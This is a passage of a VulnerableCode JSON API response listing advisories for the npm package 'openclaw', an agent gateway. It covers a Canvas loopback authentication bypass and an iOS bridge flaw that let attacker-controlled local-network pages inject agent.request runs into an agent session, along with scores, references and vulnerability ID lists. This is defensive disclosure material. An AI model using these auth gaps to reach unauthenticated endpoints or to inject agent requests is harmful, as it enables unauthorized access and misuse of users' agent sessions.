nf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnera
bility":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.23"}],"aliases":["CVE-2026-35618","GHSA-cg6c-q2hx-69h7"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-v1bp-hw9a-yffz"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91274?format=json","vulnerability_id":"VCID-v91b-1nmx-ckcx","summary":"OpenClaw: Gateway Canvas local-direct requests bypass Canvas HTTP and WebSocket authentication\n## Summary\nBefore `v2026.3.23`, Canvas and A2UI loopback requests could bypass Canvas bearer-or-capability authentication because `authorizeCanvasRequest(...)` treated `isLocalDirectRequest(...)` as an unconditional allow path.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected: `< 2026.3.23`\n- Fixed: `>= 2026.3.23`\n- Latest released tag checked: `v2026.3.23-2` (`630f1479c44f78484dfa21bb407cbe6f171dac87`)\n- Latest published npm version checked: `2026.3.23-2`\n\n## Root Cause\nThe vulnerable logic lived in `src/gateway/server/http-auth.ts`. 
`authorizeCanvasRequest(...)` returned `{ ok: true }` for local-direct requests before checking bearer authentication or an active node canvas capability, which meant unauthenticated loopback Canvas HTTP and WebSocket requests could succeed.\n\n## Fix Commit(s)\n- `d5dc6b6573ae489bc7e5651090f4767b93537c9e` — `fix(gateway): require auth for canvas routes`\n\n## Release Status\nThe fix commit is contained in released tags `v2026.3.23` and `v2026.3.23-2`. The latest shipped tag and npm release both include the fix.\n\n## Code-Level Confirmation\n- `src/gateway/server/http-auth.ts` no longer contains the local-direct early return in `authorizeCanvasRequest(...)`.\n- `src/gateway/server.canvas-auth.test.ts` adds the regression test `denies canvas HTTP/WS on loopback without bearer or capability by default`.\n\nThanks @smaeljaish771 for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35634","reference_id":"","reference_type":"","scores":[{"value":"0.00033","scoring_system":"epss","scoring_elements":"0.10198","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00033","scoring_system":"epss","scoring_elements":"0.10235","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00033","scoring_system":"epss","scoring_elements":"0.10214","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35634"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87","reference_id":"","reference_type":"","scores":[{"value":"5.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A
:N"},{"value":"5.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T12:30:11Z/"}],"url":"https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87"},{"reference_url":"https://github.com/openclaw/openclaw/commit/d5dc6b6573ae489bc7e5651090f4767b93537c9e","reference_id":"","reference_type":"","scores":[{"value":"5.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"5.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T12:30:11Z/"}],"url":"https://github.com/openclaw/openclaw/commit/d5dc6b6573ae489bc7e5651090f4767b93537c9e"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-6mqc-jqh6-x8fc","reference_id":"","reference_type":"","scores":[{"value":"5.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","s
coring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T12:30:11Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-6mqc-jqh6-x8fc"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35634","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35634"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-authentication-bypass-via-local-direct-requests-in-canvas-gateway","reference_id":"","reference_type":"","scores":[{"value":"5.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"5.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T12:30:11Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-authentication-bypass-via-local-direct-requests-in-canvas-gateway"},{"reference_url":"https://github.com/advisories/GHSA-6mqc-jqh6-x8fc","reference_id":"GHSA-6mqc-jqh6-x8fc","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-6mqc-jqh6-x8fc"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/110761?format=json","purl":"pkg:npm/openclaw@2026.3.23","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},
{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},
{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},
{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rr6t-1193-ybgz"},
{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},
{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.23"}],"aliases":["CVE-2026-35634","GHSA-6mqc-jqh6-x8fc"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-v91b-1nmx-ckcx"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89840?format=json","vulnerability_id":"VCID-v9cd-65tf-p3f8","summary":"OpenClaw: iOS A2UI bridge trusted generic local-network pages for agent.request dispatch\n## Summary\nBefore OpenClaw 2026.4.2, the iOS A2UI bridge treated generic local-network pages as trusted bridge origins. A page loaded from a local-network or tailnet host could trigger agent.request dispatch without the stricter trusted-canvas origin check.\n\n## Impact\nA loaded attacker-controlled page could inject unauthorized non-owner agent.request runs into the active iOS node session, polluting session state and consuming budget. The demonstrated impact did not include owner-only actions or arbitrary host execution.\n\n## Affected Packages / Versions\n- Package: openclaw (npm)\n- Affected versions: <= 2026.4.1\n- Patched versions: >= 2026.4.2\n- Latest published npm version: 2026.4.1\n\n## Fix Commit(s)\n49d08382a90f71dabe2877b3f6729ad85f808d57 — restrict A2UI action dispatch to trusted canvas URLs\n\n## Release Process Note\nThe fix is present on main and is staged for OpenClaw 2026.4.2. 
Publish this advisory after the 2026.4.2 npm release is live.\n\nThanks [@nexrin](https://github.com/nexrin) for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41398","reference_id":"","reference_type":"","scores":[{"value":"7e-05","scoring_system":"epss","scoring_elements":"0.00689","published_at":"2026-06-06T12:55:00Z"},{"value":"7e-05","scoring_system":"epss","scoring_elements":"0.00688","published_at":"2026-06-07T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41398"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/49d08382a90f71dabe2877b3f6729ad85f808d57","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/49d08382a90f71dabe2877b3f6729ad85f808d57"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-4p4f-fc8q-84m3","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-4p4f-fc8q-84m3"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41398","reference_id":"CVE-2026-41398","reference_type":"","scores":[],"url":"ht
tps://nvd.nist.gov/vuln/detail/CVE-2026-41398"},{"reference_url":"https://github.com/advisories/GHSA-4p4f-fc8q-84m3","reference_id":"GHSA-4p4f-fc8q-84m3","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-4p4f-fc8q-84m3"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109939?format=json","purl":"pkg:npm/openclaw@2026.4.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID
-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.2"}],"aliases":["CVE-2026-41398","GHSA-4p4f-fc8q-84m3"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-v9cd-65tf-p3f8"},{"url":"ht
